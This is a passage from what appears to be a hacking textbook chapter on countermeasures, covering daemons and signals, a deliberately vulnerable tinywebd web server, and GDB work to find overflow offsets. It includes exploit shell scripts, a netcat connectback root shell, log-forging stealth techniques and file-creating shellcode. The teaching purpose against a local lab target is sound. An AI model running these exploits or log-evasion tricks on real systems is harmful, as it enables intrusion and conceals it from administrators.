exist which try to nullify the effect of an attack, or prevent the attack from
happening
...
These defensive countermeasures can be separated into two
groups: those that try to detect the attack and those that try to protect the
vulnerability
...
The detection process could be anything from an administrator
reading logs to a program sniffing the network
...

As a system administrator, the exploits you know about aren’t nearly as
dangerous as the ones you don’t
...
Intrusions
that aren’t discovered for months can be cause for concern
...
If you know that, then you know what to look for
...
After an intrusion is detected, the hacker
can be expunged from the system, any filesystem damage can be undone by
restoring from backup, and the exploited vulnerability can be identified and
patched
...

For the attacker, this means detection can counteract everything he does
...
Stealth is one of the hacker’s most valuable assets
...
The combination of “God mode” and invisibility makes for a
dangerous hacker
...
To stay hidden, you simply need to
anticipate the detection methods that might be used
...

The co-evolutionary cycle between hiding and detecting is fueled by thinking
of the things the other side hasn’t thought of
...
A remote target will be a server
program that accepts incoming connections
...
A daemon is a program that runs in the background and detaches from the controlling terminal in a certain way
...
It refers to a
molecule-sorting demon from an 1867 thought experiment by a physicist
named James Maxwell
...
Similarly, in Linux,
system daemons tirelessly perform tasks such as providing SSH service and
keeping system logs
...

With a few additions, the tinyweb
...
This new code uses a call to the daemon() function, which will spawn a new background process
...

DAEMON(3)

Linux Programmer's Manual

DAEMON(3)

NAME
daemon - run in the background
SYNOPSIS
#include ...

Unless the argument nochdir is non-zero, daemon() changes
working directory to the root ("/")
...

RETURN VALUE
(This function forks, and if the fork() succeeds, the parent does
_exit(0), so that further errors are seen by the child only
...
If an error occurs, daemon() returns -1
and sets the global variable errno to any of the errors specified for
the library functions fork(2) and setsid(2)
...
Without a controlling terminal,
system daemons are typically controlled with signals
...

0x621 Crash Course in Signals
Signals provide a method of interprocess communication in Unix
...
Signals are identified by a number, and each
one has a default signal handler
...
This allows the program to be interrupted, even if it is stuck in an infinite loop
...

In the example code below, several signal handlers are registered for certain
signals, whereas the main code contains an infinite loop
...
c
#include ...
h>
#include ...
h
* #define SIGHUP
1 Hangup
* #define SIGINT
2 Interrupt (Ctrl-C)
* #define SIGQUIT
3 Quit (Ctrl-\)
* #define SIGILL
4 Illegal instruction
* #define SIGTRAP
5 Trace/breakpoint trap
* #define SIGABRT
6 Process aborted
* #define SIGBUS
7 Bus error
* #define SIGFPE
8 Floating point error
* #define SIGKILL
9 Kill
* #define SIGUSR1
10 User defined signal 1
* #define SIGSEGV
11 Segmentation fault
* #define SIGUSR2
12 User defined signal 2
* #define SIGPIPE
13 Write to pipe with no one reading
* #define SIGALRM
14 Countdown alarm set by alarm()
* #define SIGTERM
15 Termination (sent by kill command)
* #define SIGCHLD
17 Child process signal
* #define SIGCONT
18 Continue if stopped
* #define SIGSTOP
19 Stop (pause execution)
* #define SIGTSTP
20 Terminal stop [suspend] (Ctrl-Z)
* #define SIGTTIN
21 Background process trying to read stdin
* #define SIGTTOU
22 Background process trying to read stdout
*/
/* A signal handler */
void signal_handler(int signal) {

322

0x 600

printf("Caught signal %d\t", signal);
if (signal == SIGTSTP)
printf("SIGTSTP (Ctrl-Z)");
else if (signal == SIGQUIT)
printf("SIGQUIT (Ctrl-\\)");
else if (signal == SIGUSR1)
printf("SIGUSR1");
else if (signal == SIGUSR2)
printf("SIGUSR2");
printf("\n");
}
void sigint_handler(int x) {
printf("Caught a Ctrl-C (SIGINT) in a separate handler\nExiting
...

signal(SIGUSR2, signal_handler);
signal(SIGINT, sigint_handler);
while(1) {}

// Set sigint_handler() for SIGINT
...

}

When this program is compiled and executed, signal handlers are
registered, and the program enters an infinite loop
...
In the output below, signals that can be triggered
from the controlling terminal are used
...

reader@hacking:~/booksrc $ gcc -o signal_example signal_example
...
/signal_example
Caught signal 20
SIGTSTP (Ctrl-Z)
Caught signal 3 SIGQUIT (Ctrl-\)
Caught a Ctrl-C (SIGINT) in a separate handler
Exiting
...
By
default, the kill command sends the terminate signal (SIGTERM) to a process
...
In the
output below, the SIGUSR1 and SIGUSR2 signals are sent to the signal_example
program being executed in another terminal
...
/signal_example
24512 pts/1
S+
0:00 grep signal_example
reader@hacking:~/booksrc $ kill -10 24491
reader@hacking:~/booksrc $ kill -12 24491
reader@hacking:~/booksrc $ kill -9 24491
reader@hacking:~/booksrc $

Finally, the SIGKILL signal is sent using kill -9
...
In the
other terminal, the running signal_example shows the signals as they are
caught and the process is killed
...
/signal_example
Caught signal 10
SIGUSR1
Caught signal 12
SIGUSR2
Killed
reader@hacking:~/booksrc $

Signals themselves are pretty simple; however, interprocess communication can quickly become a complex web of dependencies
...

0x622 Tinyweb Daemon
This newer version of the tinyweb program is a system daemon that runs in
the background without a controlling terminal
...

These additions are fairly minor, but they provide a much more realistic
exploit target
...

324

0x 600

tinywebd
...
h>
...
h>
...
h>
...
h>
...
h>
"hacking
...
h"

#define PORT 80
// The port users will be connecting to
#define WEBROOT "
...
log" // Log filename
int logfd, sockfd; // Global log and socket file descriptors
void handle_connection(int, struct sockaddr_in *, int);
int get_file_size(int); // Returns the file size of open file descriptor
void timestamp(int); // Writes a timestamp to the open file descriptor
// This function is called when the process is killed
...
\n", 16);
close(logfd);
close(sockfd);
exit(0);
}
int main(void) {
int new_sockfd, yes=1;
struct sockaddr_in host_addr, client_addr;
socklen_t sin_size;

// My address information

logfd = open(LOGFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
if(logfd == -1)
fatal("opening log file");
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
fatal("setting socket option SO_REUSEADDR");
printf("Starting tiny web daemon
...

fatal("forking to daemon process");
signal(SIGTERM, handle_shutdown);
signal(SIGINT, handle_shutdown);

// Call handle_shutdown when killed
...

timestamp(logfd);
C oun t erm ea s ure s

325

write(logfd, "Starting up
...
sin_family = AF_INET;
//
host_addr
...
sin_addr
...
sin_zero), '\0', 8);

Host byte order
Short, network byte order
// Automatically fill with my IP
...

if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
fatal("binding to socket");
if (listen(sockfd, 20) == -1)
fatal("listening on socket");
while(1) { // Accept loop
...
The connection is
* processed as a web request and this function replies over the connected
* socket
...

*/
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
unsigned char *ptr, request[500], resource[500], log_buffer[500];
int fd, length;
length = recv_line(sockfd, request);
sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);
ptr = strstr(request, " HTTP/"); // Search for valid-looking request
...

ptr = NULL; // Set ptr to NULL (used to flag for an invalid request)
...

if(strncmp(request, "HEAD ", 5) == 0) // Head request
ptr = request+5; // ptr is the URL
...
html");
// add 'index
...

strcpy(resource, WEBROOT);
// Begin resource with web root path
strcat(resource, ptr);
// and join it with resource path
...

326

0x 600

if(fd == -1) { // If file is not found
strcat(log_buffer, " 404 Not Found\n");
send_string(sockfd, "HTTP/1
...

strcat(log_buffer, " 200 OK\n");
send_string(sockfd, "HTTP/1
...

send(sockfd, ptr, length, 0); // Send it to socket
...

}
close(fd); // Close the file
...

} // End if block for valid request
...

timestamp(logfd);
length = strlen(log_buffer);
write(logfd, log_buffer, length); // Write to the log
...

}
/* This function accepts an open file descriptor and returns
* the size of the associated file
...

*/
int get_file_size(int fd) {
struct stat stat_struct;
if(fstat(fd, &stat_struct) == -1)
return -1;
return (int) stat_struct
...

*/
void timestamp(fd) {
time_t now;
struct tm *time_struct;
int length;
char time_buffer[40];
time(&now); // Get number of seconds since epoch
...

length = strftime(time_buffer, 40, "%m/%d/%Y %H:%M:%S> ", time_struct);
write(fd, time_buffer, length); // Write timestamp string to log
...
The log file descriptor and
connection-receiving socket are declared as globals so they can be closed
cleanly by the handle_shutdown() function
...

The output below shows the program compiled, executed, and killed
...

reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
Starting tiny web daemon
...
c
sudo chown root
...
/tinywebd

...
/webserver_id 127
...
0
...
0
...
1 is Tiny webserver
reader@hacking:~/booksrc $ ps ax | grep tinywebd
25058 ?
Ss
0:00
...
log
cat: /var/log/tinywebd
...
log
07/22/2007 17:55:45> Starting up
...
0
...
1:38127 "HEAD / HTTP/1
...

reader@hacking:~/booksrc $

200 OK

This tinywebd program serves HTTP content just like the original tinyweb
program, but it behaves as a system daemon, detaching from the controlling
terminal and writing to a log file
...
Using the
new tinyweb daemon as a more realistic exploit target, you will learn how to
avoid detection after the intrusion
...
For this kind of attack, exploit scripts are an essential tool of the
trade
...
Through careful manipulation of the internal
mechanisms, the security can be entirely sidestepped
...
The fine line between
an exploit program and an exploit tool is a matter of finalization and reconfigurability
...
Like a gun, an
exploit program has a singular utility and the user interface is as simple as
pulling a trigger
...
In contrast, exploit
tools usually aren’t finished products, nor are they meant for others to use
...
These personalized
tools automate tedious tasks and facilitate experimentation
...

0x631 tinywebd Exploit Tool
For the tinyweb daemon, we want an exploit tool that allows us to experiment
with the vulnerabilities
...

The offset to the return address will be the same as in the original tinyweb
...
The daemon
call forks the process, running the rest of the program in the child process,
while the parent process exits
...

reader@hacking:~/booksrc $ gcc -g tinywebd
...
/a
...
gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
\n");
47
if(daemon(1, 1) == -1) // Fork to a background daemon process
...

51
signal(SIGINT, handle_shutdown);
// Call handle_shutdown when interrupted
...
c, line 50
...
out
Starting tiny web daemon
...

(gdb)

C oun t erm ea s ure s

329

When the program is run, it just exits
...
This is done by setting follow-fork-mode to child
...

(gdb) set follow-fork-mode child
(gdb) help set follow-fork-mode
Set debugger response to a program call of fork or vfork
...
follow-fork-mode can be:
parent - the original process is debugged after a fork
child
- the new process is debugged after a fork
The unfollowed process will continue to run
...

(gdb) run
Starting program: /home/reader/booksrc/a
...

[Switching to process 1051]
Breakpoint 1, main () at tinywebd
...
Exit anyway? (y or n)
reader@hacking:~/booksrc $ ps aux | grep a
...
0 0
...
0 0
...

y
Ss
R+

06:04
06:13

0:00 /home/reader/booksrc/a
...
out

It’s good to know how to debug child processes, but since we need
specific stack values, it’s much cleaner and easier to attach to a running
process
...
out processes, the tinyweb daemon is
started back up and then attached to with GDB
...

reader@hacking:~/booksrc $
root
25830 0
...
0
reader 25837 0
...
0
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $

...
/tinywebd
2880
748 pts/1
R+
20:10 0:00 grep tinywebd
gcc -g tinywebd
...
/a
...
gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

A program is being debugged already
...

(gdb) bt
#0 0xb7fe77f2 in ?? ()
#1 0xb7f691e1 in ?? ()
#2 0x08048f87 in main () at tinywebd
...
The connection is
79
* processed as a web request, and this function replies over the connected
80
* socket
...

81
*/
82
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
83
unsigned char *ptr, request[500], resource[500], log_buffer[500];
84
int fd, length;
85
86
length = recv_line(sockfd, request);
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd
...

(gdb) cont
Continuing
...

Once again, a connection is made to the webserver using a browser to advance
the code execution to the breakpoint
...
c:86
86
length = recv_line(sockfd, request);
(gdb) bt
#0 handle_connection (sockfd=5, client_addr_ptr=0xbffff810, logfd=3) at tinywebd
...
c:72
(gdb) x/x request
0xbffff5c0:
0x080484ec
(gdb) x/16x request + 500
0xbffff7b4:
0xb7fd5ff4
0xb8000ce0
0x00000000
0xbffff848
0xbffff7c4:
0xb7ff9300
0xb7fd5ff4
0xbffff7e0
0xb7f691c0
0xbffff7d4:
0xb7fd5ff4
0xbffff848
0x08048fb7
0x00000005
0xbffff7e4:
0xbffff810
0x00000003
0xbffff838
0x00000004
(gdb) x/x 0xbffff7d4 + 8
0xbffff7dc:
0x08048fb7
(gdb) p /x 0xbffff7dc - 0xbffff5c0
$1 = 0x21c
(gdb) p 0xbffff7dc - 0xbffff5c0
$2 = 540
(gdb) p /x 0xbffff5c0 + 100
$3 = 0xbffff624
(gdb) quit
The program is running
...

The safest place for the shellcode is near the middle of the 500-byte request
buffer
...
The
128 bytes of repeated return address keep the shellcode out of unsafe stack
memory, which might be overwritten
...
To keep the shellcode out of this range, a 100-byte NOP sled is put in
front of it
...
The following output exploits the vulnerability using
the loopback shellcode
...
/tinywebd
Starting tiny web daemon
...
"\r\n"') | nc -w 1 -v 127
...
0
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

Since the offset to the return address is 540 bytes, 544 bytes are needed
to overwrite the address
...
netcat is run in listen mode with an ampersand ( &) appended to
the end, which sends the process to the background
...
On the LiveCD, the at (@) symbol in the command prompt
will change color if there are background jobs, which can also be listed with
the jobs command
...
Afterward, the backgrounded
netcat process that received the connectback shell can be resumed
...
All these repetitive steps can be put into a
single shell script
...
The if statement at
the beginning of this script is just for error checking and displaying the usage

332

0x 600

message
...
The shellcode used for
the exploit is passed as a command-line argument, which makes this a useful
tool for trying out a variety of shellcodes
...
sh
#!/bin/sh
# A tool for exploiting tinywebd
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 "
exit
fi
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE))
echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr
($((4*32)) bytes)]"
( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32
...
This puts an
extra copy of the return address past where the offset dictates
...
The output below shows this tool being
used to exploit the tinyweb daemon once again, but with the port-binding
shellcode
...
/tinywebd
Starting tiny web daemon
...
/xtool_tinywebd
...
0
...
1
target IP: 127
...
0
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $ nc -vv 127
...
0
...
0
...
1] 31337 (?) open
whoami
root

Now that the attacking side is armed with an exploit script, consider what
happens when it’s used
...
The log file kept
by the tinyweb daemon is one of the first places to look into when troubleshooting a problem
...

tinywebd Log File
reader@hacking:~/booksrc $ sudo cat /var/log/tinywebd
...

07/25/2007 14:57:00> From 127
...
0
...
0"
200 OK
07/25/2007 17:49:14> From 127
...
0
...
1"
200 OK
07/25/2007 17:49:14> From 127
...
0
...
jpg HTTP/1
...
0
...
1:50203 "GET /favicon
...
1"
07/25/2007 17:57:21> Shutting down
...

08/01/2007 15:43:41> From 127
...
0
...
On secure networks, however, copies
of logs are often sent to another secure server
...
These types of countermeasures prevent tampering with the logs after successful exploitation
...
Log files usually contain many valid entries, whereas
exploit attempts stick out like a sore thumb
...

Look at the source code and see if you can figure out how to do this before
continuing on
...
0
...
1:38127
127
...
0
...
0
...
1:50202
127
...
0
...
0"
200 OK
"GET / HTTP/1
...
jpg HTTP/1
...
ico HTTP/1
...
But how exactly do you hide
a big, ugly exploit buffer in the proverbial sheep’s clothing?
334

0x 600

There’s a simple mistake in the tinyweb daemon’s source code that allows
the request buffer to be truncated early when it’s used for the log file output,
but not when copying into memory
...
These string functions are used to write to the log file, so by
strategically using both delimiters, the data written to the log can be partially
controlled
...
The NOP sled is shrunk to accommodate the new data
...
sh
#!/bin/sh
# stealth exploitation tool
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 "
exit
fi
FAKEREQUEST="GET / HTTP/1
...
\"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32
...
A null byte won’t stop the recv_line() function, so the
rest of the exploit buffer is copied to the stack
...
The following output shows this
exploit script in use
...
/tinywebd
Starting tiny web daemon
...
/xtool_tinywebd_steath
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (318 b)] [shellcode (83 b)] [ret addr (128 b)]
C oun t erm ea s ure s

335

localhost [127
...
0
...

08/02/2007 13:37:36> Starting up
...
0
...
1:32828 "GET / HTTP/1
...

0x650 Overlooking the Obvious
In a real-world scenario, the other obvious sign of intrusion is even more
apparent than log files
...
If log files seem like the most obvious sign of intrusion to you,
then you are forgetting about the loss of service
...
In a real-world scenario, this exploit would
be detected almost immediately when someone tries to access the website
...
The program
continues to process requests and it seems like nothing happened
...
Since it can take hours just to track down
where the error occurred, it’s usually better to break a complex exploit down
into smaller parts
...
The shell is interactive, which causes
some complications, so let’s deal with that later
...
Let’s begin by writing a piece of shellcode that does something to prove
it ran and then puts the tinyweb daemon back together so it can process further web requests
...
One simple way to prove
the shellcode ran is to create a file
...
Of course, the open() call will need the appropriate flags to
create a file
...
If you recall, we’ve done
something like this already—the notetaker program makes a call to open()
which will create a file if it didn’t exist
...
In the output below, this is
used to verify that the arguments to open() in C match up with the raw system calls
...
/notetaker test
execve("
...
/notetaker", "test"], [/* 27 vars */]) = 0
brk(0)
= 0x804a000
access("/etc/ld
...
nohwcap", F_OK)
= -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe5000
access("/etc/ld
...
preload", R_OK)
= -1 ENOENT (No such file or directory)
open("/etc/ld
...
cache", O_RDONLY)
= 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=70799,
...
so
...
so
...
, 512) = 512
fstat64(3, {st_mode=S_IFREG|0644, st_size=1307104,
...
}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe4000
write(1, "[DEBUG] buffer
@ 0x804a008: \'t"
...
, 43[DEBUG] datafile @ 0x804a070: '/var/notes'
) = 43
open("/var/notes", O_WRONLY|O_APPEND|O_CREAT, 0600) = -1 EACCES (Permission denied)
dup(2)
= 3
fcntl64(3, F_GETFL)
= 0x2 (flags O_RDWR)
fstat64(3, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2),
...
, 65[!!] Fatal Error in main() while opening file:
Permission denied
) = 65
close(3)
= 0
munmap(0xb7fe3000, 4096)
= 0
exit_group(-1)
= ?
Process 21473 detached
reader@hacking:~/booksrc $ grep open notetaker
...
That doesn’t matter, though;
we just want to make sure the arguments to the open() system call match the
arguments to the open() call in C
...
The compiler has already done all the work
of looking up the defines and mashing them together with a bitwise OR operation; we just need to find the call arguments in the disassembly of the notetaker binary
...
/notetaker
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
In this case, the compiler decided to use mov DWORD PTR
[esp+offset], value_to_push_to_stack instead of push instructions, but the
structure built on the stack is equivalent
...
This means that O_WRONLY|
O_CREAT|O_APPEND turns out to be 0x441 and S_IRUSR|S_IWUSR is 0x180
...

mark
...

jmp short one
two:
pop ebx
; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5
; Open()
pop eax
mov WORD cx, 0x441
; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180
; S_IRUSR|S_IWUSR
int 0x80
; Open file to create it
...

xor eax, eax
mov ebx, eax
inc eax
; Exit call
...

one:
call two
db "/HackedX"
;
01234567
C oun t erm ea s ure s

339

The shellcode opens a file to create it and then immediately closes the
file
...
The output below shows this
new shellcode being used with the exploit tool
...
/tinywebd
Starting tiny web daemon
...
s
reader@hacking:~/booksrc $ hexdump -C mark
00000000 eb 23 5b 31 c9 88 4b 07 6a 05 58 66 b9 41 04 31 |
...
K
...
Xf
...
1|
00000010 d2 66 ba 80 01 cd 80 89 c3 6a 06 58 cd 80 31 c0 |
...
j
...
1
...
/Hacke|
00000030 64 58
|dX|
00000032
reader@hacking:~/booksrc $ ls -l /Hacked
ls: /Hacked: No such file or directory
reader@hacking:~/booksrc $
...
sh mark 127
...
0
...
0
...
1
shellcode: mark (44 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-17 16:59 /Hacked
reader@hacking:~/booksrc $

0x652 Putting Things Back Together Again
To put things back together again, we just need to repair any collateral damage
caused by the overwrite and/or shellcode, and then jump execution back
into the connection accepting loop in main()
...

reader@hacking:~/booksrc $ gcc -g tinywebd
...
/a
...
so
...

(gdb) disass main
Dump of assembler code for function main:
0x08048d93 :
push
ebp
0x08048d94 :
mov
ebp,esp
0x08048d96 :
sub
esp,0x68
0x08048d99 :
and
esp,0xfffffff0
0x08048d9c :
mov
eax,0x0
0x08048da1 :
sub
esp,eax

...

0x08048f4b
0x08048f4e
0x08048f53
0x08048f56
0x08048f58

340

0x 600

:
:
:
:
:

mov
call
cmp
jne
mov

DWORD PTR [esp],eax
0x8048860
eax,0xffffffff
0x8048f64
DWORD PTR [esp],0x804961a

0x08048f5f :
0x08048f64 :
0x08048f65 :
0x08048f6c :
0x08048f6f :
0x08048f73 :
0x08048f76 :
0x08048f7a :
0x08048f7f :
0x08048f82 :
0x08048f87 :
0x08048f8a :
0x08048f8e :
0x08048f90 :
0x08048f97 :
0x08048f9c :
0x08048fa1 :
0x08048fa5 :
0x08048fa8 :
0x08048fac :
0x08048faf :
0x08048fb2 :
0x08048fb7 :
End of assembler dump
...
Let’s
use 0x08048fb7 since this is the original return address used for the call to
handle_connection()
...

Look at the function prologue and epilogue for handle_connection()
...

(gdb) disass handle_connection
Dump of assembler code for function handle_connection:
0x08048fb9 :
push
ebp
0x08048fba :
mov
ebp,esp
0x08048fbc :
push
ebx
0x08048fbd :
sub
esp,0x644
0x08048fc3 :
lea
eax,[ebp-0x218]
0x08048fc9 :
mov
DWORD PTR [esp+4],eax
0x08048fcd :
mov
eax,DWORD PTR [ebp+8]
0x08048fd0 :
mov
DWORD PTR [esp],eax
0x08048fd3 :
call
0x8048cb0
0x08048fd8 :
mov
DWORD PTR [ebp-0x620],eax
0x08048fde :
mov
eax,DWORD PTR [ebp+12]
0x08048fe1 :
movzx eax,WORD PTR [eax+2]
0x08048fe5 :
mov
DWORD PTR [esp],eax
0x08048fe8 :
call
0x80488f0

...

0x08049302 :

call

0x8048850
C oun t erm ea s ure s

341

0x08049307 :
0x0804930f :
0x08049312 :
0x08049315 :
0x0804931a :
0x08049320 :
0x08049321 :
0x08049322 :
End of assembler dump
...
Finally, 0x644 bytes are saved on the stack for these
stack variables by subtracting from ESP
...

The overwrite instructions are actually found in the recv_line() function; however, they write to data in the handle_connection() stack frame, so
the overwrite itself happens in handle_connection()
...
This means
that EBP and EBX will get mangled when the function epilogue executes
...
First, we need to assess how much collateral damage
is done by these extra instructions after the overwrite
...

The shellcode below uses an int3 instruction instead of exiting
...

mark_break
...

jmp short one
two:
pop ebx
; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5
; Open()
pop eax
mov WORD cx, 0x441
; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180
; S_IRUSR|S_IWUSR
int 0x80
; Open file to create it
...

int3
; zinterrupt
one:
call two
db "/HackedX"

To use this shellcode, first get GDB set up to debug the tinyweb daemon
...
The goal is to restore the mangled registers to their original state
found at this breakpoint
...

reader@hacking:~/booksrc $
root
23497 0
...
0
reader 23506 0
...
0
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $

...
/tinywebd
2880
748 pts/1
R+
17:09 0:00 grep tinywebd
gcc -g tinywebd
...
/a
...
gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

A program is being debugged already
...

(gdb) set dis intel
(gdb) x/5i main+533
0x8048fa8 :
mov
DWORD PTR [esp+4],eax
0x8048fac :
mov
eax,DWORD PTR [ebp-12]
0x8048faf :
mov
DWORD PTR [esp],eax
0x8048fb2 :
call
0x8048fb9
0x8048fb7 :
jmp
0x8048f65
(gdb) break *0x8048fb2
Breakpoint 1 at 0x8048fb2: file tinywebd
...

(gdb) cont
Continuing
...
Then, in another terminal window, the exploit tool is
used to throw the new shellcode at it
...

reader@hacking:~/booksrc $ nasm mark_break
...
/xtool_tinywebd
...
0
...
1
target IP: 127
...
0
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $

C oun t erm ea s ure s

343

Back in the debugging terminal, the first breakpoint is encountered
...
Then, execution continues
to the int3 instruction in the shellcode, which acts like a breakpoint
...

Breakpoint 1, 0x08048fb2 in main () at tinywebd
...

Program received signal SIGTRAP, Trace/breakpoint trap
...
However, an inspection of the instructions in main()’s
disassembly shows that EBX isn’t actually used
...
EBP, however, is used heavily, since it’s the point
of reference for all local stack variables
...

When EBP is restored to its original value, the shellcode should be able
to do its dirty work and then return back into main() as usual
...

(gdb) set dis intel
(gdb) x/5i main
0x8048d93

:
0x8048d94 :
0x8048d96 :
0x8048d99 :
0x8048d9c :
(gdb) x/5i main+533
0x8048fa8

Notesale: Turn your study into money

Already a Member? >

Search for notes by fellow students, in your own course and all over the country.

My Basket

Document Preview

This is a sample webpage